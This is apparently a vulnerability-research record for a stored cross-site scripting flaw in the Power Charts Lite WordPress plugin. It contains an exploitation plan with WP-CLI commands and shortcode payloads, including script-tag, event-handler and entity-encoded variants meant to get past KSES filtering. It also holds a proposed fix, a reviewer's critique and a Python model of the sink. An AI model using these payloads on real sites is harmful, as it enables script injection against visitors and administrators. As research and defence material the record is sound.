[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fm7Hz4StmkRV_UV4lpIrPt-oetbjcDphaKVpxGXCFWYI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-4011","power-charts-authenticated-contributor-stored-cross-site-scripting-via-id-shortcode-attribute","Power Charts \u003C= 0.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'id' Shortcode Attribute","The Power Charts Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the [pc] shortcode in all versions up to, and including, 0.1.0. This is due to insufficient input sanitization and output escaping on the 'id' shortcode attribute. Specifically, in the pc_shortcode() function, the 'id' attribute is extracted from user-supplied shortcode attributes and directly concatenated into an HTML div element's class attribute without any escaping or sanitization at line 62. The resulting HTML is then passed through html_entity_decode() before being returned, further undermining any potential safety. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wpgo-power-charts-lite",null,"\u003C=0.1.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-14 19:45:38","2026-04-15 08:28:17",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fea41d391-ba8d-43d9-8eda-69ac28c49328?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-4011 (Power Charts Lite XSS)\n\n## 1. Vulnerability Summary\nThe **Power Charts – Responsive Beautiful Charts & Graphs** plugin (version \u003C= 0.1.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the `pc_shortcode()` function, which handles the `[pc]` shortcode. The `id` attribute provided in the shortcode is concatenated directly into the `class` attribute of an HTML `div` element without sanitization or escaping. Furthermore, the final HTML output is passed through `html_entity_decode()`, which reverses any entity encoding applied upstream, so a value that reached the handler as `&lt;script&gt;` is emitted to the browser as a live `\u003Cscript>` tag; an attacker can therefore break out of the `class` attribute and inject arbitrary markup and script.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[pc]`\n*   **Vulnerable Attribute:** `id`\n*   **Authentication Level:** Contributor or higher (any role capable of creating or editing posts and using shortcodes).\n*   **Endpoint:** The standard WordPress post editor (Gutenberg or Classic) via `wp-admin\u002Fpost.php` or `wp-admin\u002Fpost-new.php`.\n*   **Preconditions:** The plugin `wpgo-power-charts-lite` must be active.\n*   **Caveats:** Contributors lack the `unfiltered_html` capability, so content they save passes through KSES, which strips raw `\u003Cscript>` and `\u003Ciframe>` tags but leaves text outside tags and existing entities untouched. Contributors also cannot publish: the post is saved as `pending`, and the payload first executes when an Editor or Administrator previews the pending post on the front end, and for every visitor once it is published.\n\n## 3. Code Flow\n1.  **Registration:** The plugin registers the shortcode using `add_shortcode( 'pc', 'pc_shortcode' )` (inferred).\n2.  
**Execution:** When a post containing `[pc id=\"...\"]` is rendered, WordPress calls `pc_shortcode( $atts )`.\n3.  **Processing (Sink):**\n    *   The attributes are merged with their defaults via `shortcode_atts()`; `id` defaults to an empty string.\n    *   At **line 62** (per description), `$atts['id']` is concatenated unescaped: \n        `$output = '\u003Cdiv class=\"pc-chart-container ' . $atts['id'] . '\">...';`\n    *   The function returns `html_entity_decode( $output )`.\n4.  **Rendering:** The returned string is embedded in the post content and sent to the browser.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does not involve a specific AJAX or REST API nonce for the *exploitation* (rendering) phase. Instead, the attacker needs a valid WordPress session and the standard nonces used to save a post:\n1.  **Post Creation\u002FEdit:** The Classic editor submits `_wpnonce` and `_wp_http_referer` with the form to `post.php`; Gutenberg saves through the REST API and sends the `wp_rest` nonce in the `X-WP-Nonce` header.\n2.  **Strategy:** The PoC agent should log in as a Contributor and use the `browser_navigate` and `browser_eval` tools to capture the nonce from the post editor page, or more simply, use **WP-CLI** to create the malicious post directly, bypassing the need for web-based nonce handling.\n\n## 5. Exploitation Strategy\nThe goal is to create a post containing a crafted shortcode that executes JavaScript when viewed.\n\n### Step 1: Payload Crafting\nSince the `id` is placed inside `class=\"...\"`, we must break out of the attribute and the tag:\n*   **Payload:** `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n*   **Shortcode:** `[pc id='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n\nThe shortcode attribute has to be single-quoted: `shortcode_parse_atts()` has no backslash escaping, so `[pc id=\"\\\">...\"]` yields an `id` of `\\` rather than the payload.\n\n### Step 2: Injection (via WP-CLI)\nThis writes the post straight into the database with the Contributor set as author (replace `contributor_user_id` with that user's numeric ID). It exercises the sink without the browser workflow, the nonces, or the Contributor's own capability checks, so it demonstrates the rendering bug rather than the Contributor save path.\n```bash\nwp post create --post_type=post --post_status=publish --post_author=contributor_user_id --post_title=\"Chart Test\" --post_content=\"[pc id='\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']\" --porcelain\n```\nWordPress applies KSES on save in any user context that lacks `unfiltered_html`, including the anonymous context WP-CLI runs in when `--user` is not given, so the raw `\u003Cscript>` tag may be stripped before it is stored. Confirm the stored content with `wp post get \u003CID> --field=post_content`, using the ID printed by `--porcelain`.\n\n### Step 3: Triggering (via HTTP)\nThe agent will navigate to the newly created post's URL. 
The WordPress renderer will process the shortcode, and the result will be:\n```html\n\u003Cdiv class=\"pc-chart-container \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\n```\n\n### Step 4: Verification\nThe agent will use `http_request` to fetch the post content and check for the unescaped `\u003Cscript>` tag.\n\n## 6. Test Data Setup\n1.  **User Creation:**\n    ```bash\n    # --porcelain prints only the new user ID, which Step 2 needs for --post_author\n    wp user create attacker_contributor attacker@example.com --role=contributor --user_pass=password123 --porcelain\n    ```\n2.  **Plugin Activation:**\n    ```bash\n    wp plugin activate wpgo-power-charts-lite\n    ```\n\n## 7. Expected Results\n*   The HTTP response for the post frontend should contain the literal string: `class=\"pc-chart-container \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">`.\n*   The `html_entity_decode` call in the plugin source undoes any encoding applied before the handler runs: a stored attribute value of `&lt;script&gt;` is emitted as `\u003Cscript>`, which is why escaping or filtering upstream of this function does not protect the output.\n\n## 8. Verification Steps\n1.  **Retrieve Post ID:** Use `wp post list --name=chart-test --format=ids` (`--name` matches the post slug, not the title), or use the ID printed by `--porcelain` in Step 2.\n2.  **Inspect HTML via CLI:**\n    ```bash\n    # This simulates the rendering logic by calling the shortcode handler directly.\n    # \\x27 is a PHP escape for the single quote that delimits the shortcode attribute.\n    wp eval 'echo do_shortcode(\"[pc id=\\x27\\\">\u003Cscript>alert(1)\u003C\u002Fscript>\\x27]\");'\n    ```\n3.  **Check for XSS Sink:** Verify the output contains `\u003Cscript>`.\n\n## 9. Alternative Approaches\n*   **Attribute Breakout (Event Handlers):** If `\u003Cscript>` tags are filtered by a WAF, or stripped by KSES on the Contributor save path, use an event handler; the value contains no `\u003C`, so KSES leaves it untouched:\n    *   `[pc id=' \" onmouseover=\"alert(1) ']`\n*   **Entity-Encoded Tags:** Because the handler returns `html_entity_decode( $output )`, an entity-encoded tag in the attribute passes KSES unchanged and is decoded into live markup at render time:\n    *   `[pc id='\">&lt;script&gt;alert(1)&lt;\u002Fscript&gt;']`\n*   **Iframe Injection** (stripped by KSES for Contributors, like `\u003Cscript>`):\n    *   `[pc id='\">\u003Ciframe src=\"javascript:alert(1)\">']`\n*   **Post Meta Injection:** If the `id` is alternatively sourced from post meta or options in certain versions, check `update_post_meta` calls in the plugin's save handlers. 
(Based on description, the shortcode attribute is the primary vector).","The Power Charts Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' attribute of the [pc] shortcode. Due to a lack of sanitization and the use of html_entity_decode() on the final output, a Contributor-level attacker can break out of an HTML class attribute to inject and execute arbitrary JavaScript.","\u002F\u002F In the pc_shortcode function\n\u002F\u002F Line 62 (approx)\n$atts = shortcode_atts( array(\n    'id' => '',\n), $atts );\n\n$output = '\u003Cdiv class=\"pc-chart-container ' . $atts['id'] . '\">';\n\u002F\u002F ... further chart processing ...\n$output .= '\u003C\u002Fdiv>';\n\nreturn html_entity_decode( $output );","--- a\u002Fwpgo-power-charts-lite.php\n+++ b\u002Fwpgo-power-charts-lite.php\n@@ -59,7 +59,7 @@\n-    $output = '\u003Cdiv class=\"pc-chart-container ' . $atts['id'] . '\">';\n+    $output = '\u003Cdiv class=\"pc-chart-container ' . esc_attr( $atts['id'] ) . '\">';\n \n-    return html_entity_decode( $output );\n+    return $output;","The exploit is performed by an authenticated user with at least Contributor permissions. The attacker creates a new post or page and embeds the [pc] shortcode with a malicious payload in the 'id' attribute. The payload uses a double-quote and a closing angle bracket to break out of the HTML class attribute (e.g., [pc id='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']). When the post is viewed by any user, the WordPress shortcode parser executes the vulnerable pc_shortcode() function, which concatenates the payload directly into the HTML output. 
The plugin's use of html_entity_decode() on the return value ensures that the injected characters are rendered as functional HTML tags rather than entities, triggering the script execution.","gemini-3-flash-preview","2026-04-16 15:42:10","2026-04-16 15:42:29",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpgo-power-charts-lite\u002Ftags"]
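Review bot: the hunk header reads `@@ -59,7 +59,7 @@` but the body shows three old and three new lines, and the description places the sink at line 62, so the line references in this diff do not agree with each other; the entry also records `patched_in_version` as null and `research_verified` as false, so this should be read as a proposed fix generated during research, not as the vendor patch. On the first `+` line, `esc_attr( $atts['id'] )` does close the attribute breakout, but the value is used as a CSS class token, for which `sanitize_html_class()` (which reduces the value to `[A-Za-z0-9_-]`) is the tighter WordPress helper. Removing `html_entity_decode()` on the second `+` line is the right direction for attacker-controlled data, but the elided code between the two changed lines may have relied on that decode for legitimate chart output, so confirm that nothing else in `$output` needs decoding, or decode only those trusted parts before they are escaped.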
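The sink described in the Code Flow section, together with the save-path behaviours the Exploitation Strategy and Alternative Approaches depend on, modelled as an added example in Python. This is not code from the Power Charts Lite plugin, from WordPress, or from the research entry above: `shortcode_parse_atts()`, `esc_attr()`, `html_entity_decode()` and KSES are approximated by small Python helpers named in the comments, and the three shortcode bodies are constructed inputs. It goes beyond the page's single payload by running the `<script>`, event-handler and entity-encoded variants through an optional KSES stage and through both the vulnerable and the hardened form of the sink.

```python
"""Model of the pc_shortcode() sink described in the research plan.

Added example: this is NOT code from the Power Charts Lite plugin, from WordPress,
or from the research entry. The WordPress pieces are approximated by small Python
helpers (see comments); the shortcode bodies in PAYLOADS are constructed inputs.
"""
import html
import re
from typing import Dict, Optional

# Approximation of WordPress shortcode_parse_atts(): key="v", key='v' and key=v.
# Like the real regex it has no backslash escaping inside quoted values.
_ATT_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s'"]+))""")


def parse_shortcode_atts(text: str) -> Dict[str, str]:
    atts = {}
    for m in _ATT_RE.finditer(text):
        atts[m.group(1)] = next(v for v in m.groups()[1:] if v is not None)
    return atts


def find_pc_shortcode(post_content: str) -> Optional[str]:
    """Return the attribute text of the first [pc ...] tag, or None."""
    m = re.search(r"\[pc\b([^\]]*)\]", post_content)
    return m.group(1) if m else None


def pc_shortcode_vulnerable(atts: Dict[str, str]) -> str:
    """The sink as the description gives it: raw concatenation, then html_entity_decode()."""
    output = '<div class="pc-chart-container ' + atts.get("id", "") + '"></div>'
    return html.unescape(output)  # stand-in for PHP html_entity_decode()


def esc_attr(value: str) -> str:
    """Stand-in for WordPress esc_attr(): ampersand, angle brackets and both quote
    characters become entities."""
    return html.escape(value, quote=True)


def pc_shortcode_fixed(atts: Dict[str, str]) -> str:
    """Hardened sink: escape at the point of output and do not decode afterwards."""
    return '<div class="pc-chart-container ' + esc_attr(atts.get("id", "")) + '"></div>'


def kses_strip_disallowed(content: str) -> str:
    """Toy stand-in for the KSES behaviour that matters here: disallowed tags such as
    <script> and <iframe> are removed on save; text outside tags and entities like
    &lt; pass through untouched."""
    return re.sub(r"</?(script|iframe)\b[^>]*>", "", content, flags=re.I)


def renders_breakout(markup: str) -> bool:
    """True when the id value escaped the class attribute: a new script tag appears,
    or a closing quote is followed by an on* event-handler attribute."""
    return "<script" in markup.lower() or re.search(r'"\s+on\w+\s*=', markup) is not None


# Constructed test inputs: the plan's payload plus the two variants that survive KSES.
PAYLOADS = {
    "script":  "[pc id='\"><script>alert(document.domain)</script>']",
    "handler": "[pc id=' \" onmouseover=\"alert(1) ']",
    "entity":  "[pc id='\">&lt;script&gt;alert(document.domain)&lt;/script&gt;']",
}


def simulate(post_content: str, through_kses: bool) -> Dict[str, object]:
    """Store one post body (optionally through KSES), then render it with both sinks."""
    stored = kses_strip_disallowed(post_content) if through_kses else post_content
    atts = parse_shortcode_atts(find_pc_shortcode(stored) or "")
    return {
        "stored": stored,
        "vulnerable": renders_breakout(pc_shortcode_vulnerable(atts)),
        "fixed": renders_breakout(pc_shortcode_fixed(atts)),
    }


if __name__ == "__main__":
    for name, body in PAYLOADS.items():
        for kses in (False, True):
            r = simulate(body, kses)
            print(f"{name:8s} kses={str(kses):5s} "
                  f"vulnerable_breakout={str(r['vulnerable']):5s} fixed_breakout={r['fixed']}")
```

Running it prints one row per payload and save path: the raw `<script>` payload only breaks out when it bypasses the KSES stage, the event-handler and entity-encoded variants break out of the vulnerable sink even after KSES, and no variant breaks out of the escaped sink. The same helpers can be pointed at a real `post_content` value pulled with `wp post get <ID> --field=post_content` to see what a given stored shortcode would render as.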